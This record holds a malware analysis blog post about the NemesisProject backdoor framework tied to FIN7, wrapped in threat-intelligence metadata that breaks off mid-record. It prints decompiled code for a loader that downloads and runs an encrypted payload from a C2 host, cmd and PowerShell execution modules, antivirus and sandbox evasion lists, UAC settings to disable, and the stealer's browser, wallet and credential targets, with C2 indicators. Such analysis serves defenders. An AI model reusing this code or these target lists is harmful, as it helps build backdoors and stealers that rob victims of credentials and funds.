{ "id": "b3f32b3a-2291-4fe1-8b48-da81560742da", "created_at": "2026-04-06T00:07:05.869846Z", "updated_at": "2026-04-10T03:37:09.131604Z", "deleted_at": null, "sha1_hash": "19c3e75214a9de6ed66964ca8dd50d0f823345cc", "title": "NemesisProject", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 121623, "plain_text": "NemesisProject\r\nBy Jason Reaves\r\nPublished: 2023-07-31 · Archived: 2026-04-05 18:08:51 UTC\r\nBy: Jason Reaves, Jonathan McCay and Joshua Platt\r\nNemesisProject has been seen being utilized at least partially by FIN7[1] recently where it was seen being\r\ndelivered through Tirion (aka Lizar, DiceLoader). The project itself comes as a backdoor framework with plugin\r\ncomponents:\r\nBotLoaderStarter\r\nBot Module\r\nCMD Module\r\nPowershell Module\r\nPrintScreen Module\r\nStealer Module\r\nIt appears to be in active development, most of the pieces CI has recovered or looked at have been written in\r\n.NET. The components have functionality to directly load and execute managed assembly code.\r\nTechnical Overview\r\nAs previously mentioned, this framework has a number of components, we will go over each component below.\r\nBotLoaderStarter\r\nThe BotLoaderStarter is, as the name suggests, a loader designed to download and run a file; it comes with\r\nonboard settings or a configuration for the Loader:\r\nnamespace Bot.Settings\r\n{\r\n public static class Setup\r\n {\r\n public static string WebChannelMainUrl1 = \"http://de-signui.]com/api/support\";\r\n public static string WebChannelMainUrl2 = \"\";\r\n public static string WebChannelMainUrl3 = \"\";\r\n public static string OneDriveChannelLogin = \"\";\r\n public static string OneDriveChannelPassword = \"\";\r\n public static string OneDriveChannelUrlPath = \"\";\r\n public static string AzureConnectionString = \"\";\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 1 of 20\n\npublic static string IsEnableCryptorBot = \"1\";\r\n public static string SeparateWord = \"OEYQBEDEOUNN\";\r\n }\r\n}\r\nThe main functionality as previously mentioned is to download and run a file:\r\n private static string botName = \"m_BOT.dll\";\r\n public static void Run()\r\n {\r\n byte[] array = Main.DownloadBot(Setup.WebChannelMainUrl1);\r\n if (array == null \u0026\u0026 !string.IsNullOrEmpty(Setup.WebChannelMainUrl2))\r\n {\r\n array = Main.DownloadBot(Setup.WebChannelMainUrl2);\r\n }\r\n if (array == null \u0026\u0026 !string.IsNullOrEmpty(Setup.WebChannelMainUrl3))\r\n {\r\n array = Main.DownloadBot(Setup.WebChannelMainUrl3);\r\n }\r\n Main.CheckAndStartBot(array);\r\n }\r\nIn this case the file to be downloaded is called ‘m_BOT.dll’ and will be downloaded over HTTP, you may have\r\nnoticed that there were two other methods of communications available in the config data which was Azure and\r\nOneDrive, but they are not used by this loader.\r\nThe downloaded file is encrypted using RC4 but the key and start of the encrypted data is actually inside the\r\ndownloaded binary:\r\nprivate static void CheckAndStartBot(byte[] data)\r\n {\r\n if (data == null)\r\n {\r\n return;\r\n }\r\n if (Setup.IsEnableCryptorBot == \"1\")\r\n {\r\n string separateWord = Setup.SeparateWord;\r\n byte[] bytes = Encoding.UTF8.GetBytes(separateWord);\r\n List\u003cint\u003e list = Main.IndexOfSequence(data, bytes, 0);\r\n byte[] arg_90_0 = data.Skip(list[0] + bytes.Length).Take(list[1] - list[0] - bytes.Length).ToArra\r\n byte[] data2 = data.Skip(list[1] + bytes.Length).Take(data.Length - list[1] - bytes.Length).ToAr\r\n Main.StartBot(Main.RC4(arg_90_0, data2));\r\n return;\r\n }\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 2 of 20\n\nMain.StartBot(data);\r\n }\r\n private static void StartBot(byte[] bot)\r\n {\r\n new Thread(delegate\r\n {\r\n Type type = Assembly.Load(bot).GetType(\"Bot.Main\");\r\n type.InvokeMember(\"Run\", BindingFlags.InvokeMethod, null, type, new object[0]);\r\n }).Start();\r\n }\r\nThe loader uses the SeparateWord string from the settings to find the RC4 key and the start of the encrypted data.\r\nPython example:\r\n\u003e\u003e\u003e t2 = data[6144:]\r\n\u003e\u003e\u003e t2[:100]\r\nb'LCYEQDQMFUBTJBDXERQTLCYEQDQMFUBTU\\xd6\\x9f\\xec\\x95\\x00dv\\xcb0\\xb4\\x04\\xe9I\\xea\\xccxh72#}\\x05\\xc6J\\x9\r\n\u003e\u003e\u003e len(sep)\r\n12\r\n\u003e\u003e\u003e t2 = t2[12:]\r\n\u003e\u003e\u003e t2[:100]\r\nb'JBDXERQTLCYEQDQMFUBTU\\xd6\\x9f\\xec\\x95\\x00dv\\xcb0\\xb4\\x04\\xe9I\\xea\\xccxh72#}\\x05\\xc6J\\x97F\\xe4\\xeb\\x\r\n\u003e\u003e\u003e t2.find(sep)\r\n8\r\n\u003e\u003e\u003e d = t2[:8]\r\n\u003e\u003e\u003e t2 = t2[8+12:]\r\n\u003e\u003e\u003e t2[:100]\r\nb'U\\xd6\\x9f\\xec\\x95\\x00dv\\xcb0\\xb4\\x04\\xe9I\\xea\\xccxh72#}\\x05\\xc6J\\x97F\\xe4\\xeb\\x80\\xa4\\xc4\\xcb\\n]s\\x\r\n\u003e\u003e\u003e t2.find(sep)\r\n-1\r\n\u003e\u003e\u003e from Crypto.Cipher import ARC4\r\n\u003e\u003e\u003e rc4 = ARC4.new(d)\r\n\u003e\u003e\u003e ttt = rc4.decrypt(t2)\r\n\u003e\u003e\u003e ttt[:100]\r\nb'MZ\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\r\n\u003e\u003e\u003e sep\r\nb'LCYEQDQMFUBT'\r\n\u003e\u003e\u003e d\r\nb'JBDXERQT'\r\nBot\r\nThe bot piece of this framework contains a large amount of encoded strings, even in the additionally included\r\nlibraries. The encoding is just a base64 decode followed by a GZIP decompress:\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 3 of 20\n\ndef decode(a):\r\n t = base64.b64decode(a)\r\n l = struct.unpack_from(‘\u003cI’, t)[0]\r\n if l != 0:\r\n return(zlib.decompress(t[4:],30))\r\n return(t[4:])\r\nUsing the above function, we can quickly enumerate all the decompiled .NET code to enumerate all the encoded\r\nstrings, a quick list of all the decoded strings from the bot code only:\r\nx\r\nAzure\r\nRUNDLL\r\n.txt\r\n.dll\r\nPOST\r\n_cmd\r\nSUCCESS\r\n\"\r\nRun\r\n.jpg\r\n_run\r\nUpload----\r\nfile\r\n_\r\nCMD\r\nPRINTSCREEN\r\n/\r\nSHELLCODE\r\n[^A-Za-z0-9]\r\nx86\r\ndocuments\r\nPOWERSHELL\r\n_scr\r\n/PostFile\r\nbotshare\r\nWeb {0}\r\nhttp://de-signui.com/api/support\r\nx64\r\n_ping\r\n?file=\r\n_ps\r\n_msg\r\nOneDrive\r\nModule.Main\r\nKILL\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 4 of 20\n\nb_\r\nbdir\r\nm_\r\nLCYEQDQMFUBT\r\napplication/json\r\n_kill\r\n_resp\r\nSTEALER\r\n_stealer\r\napplication/octet-stream\r\nPING\r\n_pong\r\nNONE\r\nERROR\r\n_inject\r\n1\r\nPONG\r\nC2 traffic can be over Web, OneDrive or Azure:\r\n if (!string.IsNullOrEmpty(Setup.WebChannelMainUrl1))\r\n {\r\n this.engineWeb1 = WebChannelWrapper.Engine.GetEngine(BotEngine.botId, Setup.WebChannelMainUrl1, n\r\n }\r\n if (!string.IsNullOrEmpty(Setup.WebChannelMainUrl2))\r\n {\r\n this.engineWeb2 = WebChannelWrapper.Engine.GetEngine(BotEngine.botId, Setup.WebChannelMainUrl2, n\r\n }\r\n if (!string.IsNullOrEmpty(Setup.WebChannelMainUrl3))\r\n {\r\n this.engineWeb3 = WebChannelWrapper.Engine.GetEngine(BotEngine.botId, Setup.WebChannelMainUrl3, n\r\n }\r\n if (!string.IsNullOrEmpty(Setup.OneDriveChannelLogin) \u0026\u0026 !string.IsNullOrEmpty(Setup.OneDriveChann\r\n {\r\n this.engineOneDrive = new OneDriveWrapper.Engine(BotEngine.botId, Setup.OneDriveChannelLogin, Set\r\n }\r\n if (!string.IsNullOrEmpty(Setup.AzureConnectionString))\r\n {\r\n this.engineAzure = new AzureWrapper.Engine(BotEngine.botId, Setup.AzureConnectionString, num++);\r\n }\r\nThe OneDrive and Azure mode operate in a similar manner, they create a file on either an Azure tenant or in a\r\nSharePoint folder. The filename will be based on bot data and then gets checked periodically waiting for a\r\ncommand or task to run.\r\nCommand functionality:\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 5 of 20\n\nHeartBeat\r\nTimerTick\r\nPowerShellScriptRun\r\nStealerRun\r\nInjectShellCode\r\nCmdScriptRun\r\nRunModuleWithBodyAndReturnMessage\r\nRunModuleWithBody\r\nPrintScreen\r\nKILL\r\nRunICE\r\nPing\r\nPong\r\nRunDLL\r\nAzure config template:\r\n private string connectionString;\r\n private string shareName = \"botshare\";\r\n private string dirName = \"bdir\";\r\n private string botId;\r\n private string templateResponse;\r\n private string templatePowerShell;\r\n private string templateCmd;\r\n private string templateStealer;\r\n private string templatePrintScreen;\r\n private string templatePrintScreenFile;\r\n private string templatePing;\r\n private string templateRun;\r\n private string templateInjectShellCode;\r\n private string templatePong;\r\n private string templateKill;\r\n private string templateMessage;\r\n private string templateResponseEnd = '_resp';\r\n private string templatePowerShellEnd = '_ps';\r\n private string templateCmdEnd = '_cmd';\r\n private string templateStealerEnd = '_stealer';\r\n private string templatePrintScreenEnd = '_scr';\r\n private string templatePingEnd = '_ping';\r\n private string templatePongEnd = '_pong';\r\n private string templateRunEnd = '_run';\r\n private string templateInjectShellCodeEnd = inject';\r\n private string templateKillEnd = '_kill';\r\n private string templateMessageEnd = '_msg';\r\n private string templateStartBot = 'b_';\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 6 of 20\n\nprivate string templateStartModule = 'm_';\r\n public bool IsActive\r\nPingPong sends off some bot info when it performs a checkin:\r\n return Json.Serialize(new PingPong(botId)\r\n {\r\n State = state,\r\n Type = type,\r\n FileName = fileName,\r\n OsName = SystemHelper.GetOSInfo(),\r\n Ip = SystemHelper.GetLocalIPAddress(),\r\n AvDetect = SystemHelper.CheckAV(),\r\n Message = message\r\n }, null);\r\nThe CheckAV function looks for a very large amount of AV artifacts:\r\nALYac\r\naylaunch.exe\r\nayupdate2.exe\r\nAYRTSrv.exe\r\nAYAgent.exe\r\nAVG\r\nAVGSvc.exe\r\nAVGUI.exe\r\navgwdsvc.exe\r\navg.exe\r\navgaurd.exe\r\navgemc.exe\r\navgrsx.exe\r\navgserv.exe\r\navgw.exe\r\nAcronis\r\narsm.exe\r\nacronis_license_service.exe\r\nAd-Aware\r\nAdAwareService.exe\r\nAd-Aware.exe\r\nAdAware.exe\r\nAhnLab-V3\r\npatray.exe\r\nV3Svc.exe\r\nArcabit\r\narcavir.exe\r\narcadc.exe\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 7 of 20\n\nArcaVirMaster.exe\r\nArcaMainSV.exe\r\nArcaTasksService.exe\r\nAvast\r\nashDisp.exe\r\nAvastUI.exe\r\nAvastSvc.exe\r\nAvastBrowser.exe\r\nAfwServ.exe\r\nAvira AntiVirus\r\navcenter.exe\r\navguard.exe\r\navgnt.exe\r\nsched.exe\r\nBaiduSdSvc.exe\r\nBaiduSdTray.exe\r\nBaiduSd.exe\r\nbddownloader.exe\r\nbaiduansvx.exe\r\nBitDefender\r\nBdagent.exe\r\nBitDefenderCom.exe\r\nvsserv.exe\r\nbdredline.exe\r\nbdservicehost.exe\r\nBkav\r\nBKavService.exe\r\nBka.exe\r\nBkavUtil.exe\r\nBLuPro.exe\r\nCAT-QuickHeal\r\nQUHLPSVC.exe\r\nonlinent.exe\r\nsapissvc.exe\r\nscanwscs.exe\r\nCMC\r\nCMCTrayIcon.exe\r\nClamAV\r\nfreshclam.exe\r\nComodo\r\ncpf.exe\r\ncavwp.exe\r\nccavsrv.exe\r\ncmdvirth.exe\r\nCrowdStrike Falcon\r\ncsfalconservice.exe\r\nCSFalconContainer.exe\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 8 of 20\n\nCybereason\r\nCybereasonRansomFree.exe\r\nCybereasonRansomFreeServiceHost.exe\r\nCybereasonAV.exe\r\nCylance\r\nCylanceSvc.exe\r\nCyren\r\nvsedsps.exe\r\nvseamps.exe\r\nvseqrts.exe\r\nDrWeb\r\ndrwebcom.exe\r\nspidernt.exe\r\ndrwebscd.exe\r\ndrweb32w.exe\r\ndwengine.exes\r\nESET-NOD32\r\negui.exe\r\necls.exe\r\nekrn.exe\r\neguiProxy.exe\r\nEmsisoft\r\na2cmd.exe\r\na2guard.exe\r\nEndgame\r\nendgame.exe\r\nF-Prot\r\nF-PROT.exe\r\nFProtTray.exe\r\nFPAVServer.exe\r\nf-stopw.exe\r\nf-prot95.exe\r\nf-agnt95.exe\r\nF-Secure\r\nf-secure.exe\r\nfssm32.exe\r\nFsorsp64.exe\r\nfsavgui.exe\r\nfameh32.exe\r\nfch32.exe\r\nfih32.exe\r\nfnrb32.exe\r\nfsav32.exe\r\nfsma32.exe\r\nfsmb32.exe\r\nFireEye\r\nxagtnotif.exe\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 9 of 20\n\nxagt.exe\r\nFortinet\r\nFortiClient.exe\r\nFortiTray.exe\r\nFortiScand.exe\r\nGData\r\nAVK.exe\r\navkcl.exe\r\navkpop.exe\r\navkservice.exe\r\nIkarus\r\nguardxservice.exe\r\nguardxkickoff.exe\r\nKVFW.exe\r\nKVsrvXP.exe\r\nKVMonXP.exe\r\nKVwsc.exe\r\nK7AntiVirus\r\nK7TSecurity.exe\r\nK7TSMain.Exe\r\nK7TSUpdT.exe\r\nKaspersky\r\navp.exe\r\navpcc.exe\r\navpm.exe\r\nkavpf.exe\r\nKingsoft\r\nkxetray.exe\r\nksafe.exe\r\nKSWebShield.exe\r\nkpfwtray.exe\r\nKWatch.exe\r\nKSafeSvc.exe\r\nKSafeTray.exe\r\nMax Secure Software\r\nSDSystemTray.exe\r\nMaxRCSystemTray.exe\r\nRCSystemTray.exe\r\nMalwarebytes\r\nMalwarebytesPortable.exe\r\nMbae.exe\r\nMBAMIService.exe\r\nmbamdor.exe\r\nMcAfee\r\nMcshield.exe\r\nTbmon.exe\r\nFrameworkservice.exe\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 10 of 20\n\nfiresvc.exe\r\nfiretray.exe\r\nhipsvc.exe\r\nmfevtps.exe\r\nmcafeefire.exe\r\nshstat.exe\r\nvstskmgr.exe\r\nengineserver.exe\r\nalogserv.exe\r\navconsol.exe\r\ncmgrdian.exe\r\ncpd.exe\r\nmcmnhdlr.exe\r\nmcvsshld.exe\r\nmcvsrte.exe\r\nmghtml.exe\r\nmpfservice.exe\r\nmpfagent.exe\r\nmpftray.exe\r\nvshwin32.exe\r\nvsstat.exe\r\nguarddog.exe\r\nMicrosoft security essentials\r\nMsMpEng.exe\r\nmssecess.exe\r\nemet_service.exe\r\ndrwatson.exe\r\nNANO-Antivirus\r\nnanoav.exe\r\nnanoav64.exe\r\nnanoreport.exe\r\nnanoreportc.exe\r\nnanoreportc64.exe\r\nnanorst.exe\r\nnanosvc.exe\r\na-squared free\r\na2guard.exe\r\na2free.exe\r\na2service.exe\r\nPalo Alto Networks\r\nPanInstaller.exe\r\nPanda Security\r\nremupd.exe\r\napvxdwin.exe\r\npavproxy.exe\r\npavsched.exe\r\nQihoo-360\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 11 of 20\n\n360sd.exe\r\n360tray.exe\r\nZhuDongFangYu.exe\r\n360rp.exe\r\n360safe.exe\r\n360safebox.exe\r\nQHActiveDefense.exe\r\nRising\r\nRavMonD.exe\r\nrfwmain.exe\r\nRsMgrSvc.exe\r\nSUPERAntiSpyware\r\nsuperantispyware.exe\r\nsascore.exe\r\nSAdBlock.exe\r\nsabsvc.exe\r\nSecureAge APEX\r\nUniversalAVService.exe\r\nEverythingServer.exe\r\nclamd.exe\r\nSophos AV\r\nSavProgress.exe\r\nSophosUI.exe\r\nSophosFS.exe\r\nSophosHealth.exe\r\nSophosSafestore64.exe\r\nSophosCleanM.exe\r\nicmon.exe\r\nSymantec\r\nccSetMgr.exe\r\nccapp.exe\r\nvptray.exe\r\nccpxysvc.exe\r\ncfgwiz.exe\r\nsmc.exe\r\nsymproxysvc.exe\r\nvpc32.exe\r\nlsetup.exe\r\nluall.exe\r\nlucomserver.exe\r\nsbserv.exe\r\nTencent\r\nQQPCRTP.exe\r\nQQPCTray.exe\r\nQQPCMgr.exe\r\nTotalDefense\r\nAMRT.exe\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 12 of 20\n\nSWatcherSrv.exe\r\nPrd.ManagementConsole.exe\r\nTrapmine\r\nTrapmineEnterpriseService.exe\r\nTrapmineEnterpriseConfig.exe\r\nThe list of available modules that the bot can download (can be either 32 or 64 bit):\r\nPRINTSCREEN\r\nCMD\r\nSTEALER\r\nPOWERSHELL\r\nNemesis Stealer\r\nThe stealer component has been previously reported on[1], it is interesting that the stealer comes with its own\r\nconfiguration onboard which would allow it to be used independently. In this case the C2 is the same as the\r\nprevious bot piece.\r\nIn terms of functionality the stealer did not include C2 functionality for Azure or OneDrive but instead operated\r\nover HTTP, it also checks the country of the system it is running on to see if it is one of these countries:\r\nArmenia\r\nAzerbaijan\r\nBelarus\r\nKazakhstan\r\nKyrgyzstan\r\nMoldova\r\nUzbekistan\r\nUkraine\r\nRussia\r\nHas built-in checks for the following as well:\r\nRDP available\r\nSandBoxie\r\nVirtual check\r\nFor the virtual machine check it will perform WMI queries on Win32_ComputerSystem to check for the following\r\nstrings:\r\nvirtual\r\nvmbox\r\nvmware\r\nvirtualbox\r\nbox\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 13 of 20\n\nthinapp\r\nVMXh\r\ninnotek gmbh\r\ntpvcgateway\r\ntpautoconnsvc\r\nvbox\r\nkvm\r\nred hat\r\nThe stealer will also attempt to turn off the following registry values:\r\nPromptOnSecureDesktop\r\nConsentPromptBehaviorAdmin\r\nBrowsers are targeted for harvesting logins, bookmarks, cookies, credit cards, autofills and history data. The\r\nbrowsers targeted can be split between Chromium based and Gecko based.\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nChromium based browsers:\r\nGoogle Chrome\r\nOpera Stable\r\nOpera\r\nOpera Neon\r\nCitrio\r\nCoolNovo\r\nAvant Webkit\r\nIridium\r\nYandex\r\nOrbitum\r\nKinza\r\nBrave\r\nAmigo\r\nTorch\r\nComodo Dragon\r\nKometa\r\nVivaldi\r\nNichrome Rambler\r\nEpic Privacy\r\nCocCoc\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 14 of 20\n\n360Browser\r\nSputnik\r\nUran\r\nCentBrowser\r\n7Star\r\nElements\r\nSuperbird\r\nChedot\r\nSuhba\r\nMustang\r\nEdge\r\nPaths:\r\n\"\\\\Chromium\\\\User Data\\\\\",\r\n\"\\\\Google\\\\Chrome\\\\User Data\\\\\",\r\n\"\\\\Google(x86)\\\\Chrome\\\\User Data\\\\\",\r\n\"\\\\Opera Software\\\\\",\r\n\"\\\\MapleStudio\\\\ChromePlus\\\\User Data\\\\\",\r\n\"\\\\Iridium\\\\User Data\\\\\",\r\n\"\\\\7Star\\\\7Star\\\\User Data\\\\\",\r\n\"\\\\CentBrowser\\\\User Data\\\\\",\r\n\"\\\\Chedot\\\\User Data\\\\\",\r\n\"\\\\Vivaldi\\\\User Data\\\\\",\r\n\"\\\\Kometa\\\\User Data\\\\\",\r\n\"\\\\Elements Browser\\\\User Data\\\\\",\r\n\"\\\\Epic Privacy Browser\\\\User Data\\\\\",\r\n\"\\\\Microsoft\\\\Edge\\\\User Data\\\\\",\r\n\"\\\\uCozMedia\\\\Uran\\\\User Data\\\\\",\r\n\"\\\\Fenrir Inc\\\\Sleipnir5\\\\setting\\\\modules\\\\ChromiumViewer\\\\\",\r\n\"\\\\CatalinaGroup\\\\Citrio\\\\User Data\\\\\",\r\n\"\\\\Coowon\\\\Coowon\\\\User Data\\\\\",\r\n\"\\\\liebao\\\\User Data\\\\\",\r\n\"\\\\QIP Surf\\\\User Data\\\\\",\r\n\"\\\\Orbitum\\\\User Data\\\\\",\r\n\"\\\\Comodo\\\\Dragon\\\\User Data\\\\\",\r\n\"\\\\Amigo\\\\User\\\\User Data\\\\\",\r\n\"\\\\Torch\\\\User Data\\\\\",\r\n\"\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\\",\r\n\"\\\\Comodo\\\\User Data\\\\\",\r\n\"\\\\360Browser\\\\Browser\\\\User Data\\\\\",\r\n\"\\\\Maxthon3\\\\User Data\\\\\",\r\n\"\\\\K-Melon\\\\User Data\\\\\",\r\n\"\\\\Sputnik\\\\Sputnik\\\\User Data\\\\\",\r\n\"\\\\Nichrome\\\\User Data\\\\\",\r\n\"\\\\CocCoc\\\\Browser\\\\User Data\\\\\",\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 15 of 20\n\n\"\\\\Uran\\\\User Data\\\\\",\r\n\"\\\\Chromodo\\\\User Data\\\\\",\r\n\"\\\\Mail.Ru\\\\Atom\\\\User Data\\\\\",\r\n\"\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\\"\r\nGecko Based browsers:\r\nFirefox\r\nMozilla\r\nIceDragon\r\nComodo_Dragon\r\nPale_Moon\r\nWaterfox\r\nThunderbird\r\nCyberfox\r\nNETGATE_BlackHaw\r\nPaths:\r\n\"\\\\Mozilla\\\\Firefox\",\r\n\"\\\\Comodo\\\\IceDragon\",\r\n\"\\\\Mozilla\\\\SeaMonkey\",\r\n\"\\\\Moonchild Productions\\\\Pale Moon\",\r\n\"\\\\Waterfox\",\r\n\"\\\\K-Meleon\",\r\n\"\\\\Thunderbird\",\r\n\"\\\\8pecxstudios\\\\Cyberfox\",\r\n\"\\\\NETGATE Technologies\\\\BlackHaw\"\r\nParses credit card numbers:\r\nAmex Card\r\nBCGlobal\r\nCarte Blanche Card\r\nDiners Club card\r\nDiscover Card\r\nInsta Payment Card\r\nJCB Card\r\nKoreanLocalCard\r\nLaser Card\r\nMaestro Card\r\nMastercard\r\nSolo Card\r\nSwitch Card\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 16 of 20\n\nUnion Pay Card\r\nVisa Card\r\nVisa Mastercard\r\nExpress Card\r\nApplications targeted:\r\nDynDNS\r\nFileZilla\r\nFoxMail\r\nPidgin\r\nTelegram\r\nDiscord Tokens\r\nSteam local config\r\nSteam profile data\r\nNordVPN\r\nOpenVPN\r\nProtonVPN\r\nCrypto Wallets:\r\nElectrum\r\nElectrum-DASH\r\nEthereum\r\nExodus\r\nAtomic\r\nJaxx\r\nCoinomi\r\nGuarda\r\nArmory\r\nZcash\r\nBytecoin\r\nCrypto Extensions:\r\nMetaMask — nkbihfbeogaeaoehlefnkodbefgpgknn\r\nTronLink — ibnejdfjmmkpcnlpebklmnkoeoihofec\r\nBinance — fhbohimaelbohpjbbldcngcnapndodjp\r\nThe stealer will also attempt to harvest files from the infected system that match a list of extensions, in this case\r\nthe following:\r\n.txt\r\n.doc\r\n.cs\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 17 of 20\n\n.html\r\n.htm\r\n.xml\r\n.php\r\n.json\r\n.rdp\r\n.ovpn\r\nCMD Module\r\nThe CMD module is for executing a shell command via cmd.exe and then returning the result.\r\n public static class Main\r\n {\r\n public static string Run(string cmd)\r\n {\r\n Process expr_36 = Process.Start(new ProcessStartInfo(\"cmd.exe\", \"/c \" + cmd)\r\n {\r\n CreateNoWindow = true,\r\n UseShellExecute = false,\r\n RedirectStandardError = true,\r\n RedirectStandardOutput = true\r\n });\r\n expr_36.WaitForExit();\r\n string result = expr_36.StandardOutput.ReadToEnd();\r\n expr_36.StandardError.ReadToEnd();\r\n int arg_5A_0 = expr_36.ExitCode;\r\n expr_36.Close();\r\n return result;\r\n }\r\n }\r\nPOWERSHELL Module\r\nThe PowerShell module is similar to the CMD one except that it detonates a PowerShell command:\r\nnamespace Module\r\n{\r\n public static class Main\r\n {\r\n public static bool Run(string cmd)\r\n {\r\n PowerShell.Create().AddScript(cmd).Invoke();\r\n return true;\r\n }\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 18 of 20\n\n}\r\n}\r\nPRINTSCREEN Module\r\nThe printscreen module takes a screenshot and returns it:\r\n public static class Main\r\n {\r\n public static byte[] Run()\r\n {\r\n Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height)\r\n Graphics.FromImage(bitmap).CopyFromScreen(0, 0, 0, 0, bitmap.Size);\r\n MemoryStream memoryStream = new MemoryStream();\r\n bitmap.Save(memoryStream, ImageFormat.Jpeg);\r\n memoryStream.Position = 0L;\r\n return Main.StreamToByteArray(memoryStream);\r\n }\r\nIOCS\r\nWMI commands\r\nSELECT * FROM Win32_ComputerSystem\r\nSELECT * FROM Win32_OperatingSystem\r\n- version\r\n- user\r\n- serialnumber\r\n- computer name\r\n- logical processes\r\n- system direction\r\nSELECT * FROM Win32_Processor\r\n- CPU name\r\n- cpu id\r\nSELECT * FROM Win32_DesktopMonitor\r\n- screen resolution\r\nSELECT * FROM Win32_BIOS\r\n- BIOS version\r\nSELECT * FROM AntiVirusProduct\r\n- installed antivirus\r\nSELECT * FROM FirewallProduct\r\n- installed firewall\r\nSELECT TotalPhysicalMemory FROM Win32_ComputerSystem\r\n- TotalPhysicalMemory\r\nSELECT * FROM Win32_PhysicalMemory\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 19 of 20\n\n- capacity\r\n- memorytype\r\nSELECT * FROM Win32_VideoController\r\n- adapterram\r\nFiles written:\r\nCounter.txt\r\nClip_BoardText.txt\r\nInformation.html\r\nInstalled_Software_Log.txt\r\nProcessInfo_Log.txt\r\nScreenShot.png\r\nUserAgents.txt\r\nPasswords.txt\r\nDynDns_Log.txt\r\nFileZilla_Log.txt\r\nFoxMail_Log.txt\r\nPidgin_Log.txt\r\nlog.txt\r\nVPN/Nord_Log.txt\r\nVPN/ProtonVPN_Log.txt\r\nSteam/SteamID_Log.txt\r\nDiscord/Tokens.txt\r\nMalware C2:\r\nes-megadom.com\r\n194.87.148.85\r\n195.123.245.30\r\n65.108.255.127\r\n213.166.71.155\r\n23.227.193.141\r\nplus-lema.com\r\ndeveparty.com\r\nde-signui.com\r\n91.107.143.20\r\nhelloworld2.watela2425.workers.dev\r\nReferences\r\n1: https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-backdoor/\r\nSource: https://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5" ], "report_names": [ "nemesisproject-816ed5c1e8d5" ], "threat_actors": [ { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf", "created_at": "2023-01-06T13:46:38.405479Z", "updated_at": "2026-04-10T02:00:02.961112Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ 